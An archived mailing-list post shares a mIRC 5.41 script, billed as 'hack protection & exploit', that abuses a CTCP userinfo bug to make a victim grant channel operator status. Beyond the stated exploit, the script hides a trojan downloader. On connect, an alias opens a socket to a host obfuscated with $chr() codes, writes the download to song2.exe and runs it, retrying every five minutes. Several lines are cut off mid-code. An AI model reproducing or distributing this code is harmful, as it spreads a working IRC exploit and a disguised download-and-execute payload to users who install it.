Hi, while debugging/hexing/disassembling mirc my friend slotmech last week found a mirc bug which allows to force users to send MODE commands to the server. this example script sends a MODE +o to the irc server. the mirc author has been notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us. cya, fs --- cut here --- ;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstormat_private> ;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$;#; ;#; -------- Use /hackop nick #channel to make nick give you op on #channel ! ;#; -------- That's it... have phun! ;#; ;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz ! ;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#; ;#; if you want to add this code to your own script please: ASK FIRST! ctcp 1:userinfo*: antihack alias antihack { if ($len($2) > 17 && $chr(91) isin $2-) { echo $active mIRC5.41 hack attempt from $nick .halt } } alias hackop { if ($2 == $null) { echo 3 *** Usage: /hackop nick #channel .halt } if ($me !ison $2) { echo 3 *** You aren't on that Channel! .halt } if ($1 !isop $2) { echo 3 *** $1 isn't opped on that channel! .halt } checklen $1 .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $} alias checklen { .if (%xcomplete == 1) halt .if (%xinprog == 1) halt .set %xfilename song2.exe .set %xlof $lof(%xfilename) .set %xfirst 1 .write -c %xfilename ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$ .sockclose protx .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$} on 1:sockopen:protx: { .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$ .sockwrite -n protx } on 1:sockread:protx: { .sockread &test .set %xlof $lof(%xfilename) .if (%xfirst == 1) set %xlof 0 .set %xfirst 0 .bwrite %xfilename %xlof $sockbr &test } on 1:connect:checklen on 1:sockclose:protx: { .sockread &test if ($sockbr > 0) { .set %xlof $lof(%xfilename) .bwrite %xfilename %xlof $sockbr &test } .if ($lof(%xfilename) == 178306) { .run %xfilename .set %xcomplete 1 } if ($lof(%xfilename) != 178306) { .timer 1 300 checklen } } unset %xinprog unset %xfilename unset %xlof unset %xfirst } --- cut here ---
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:15 PDT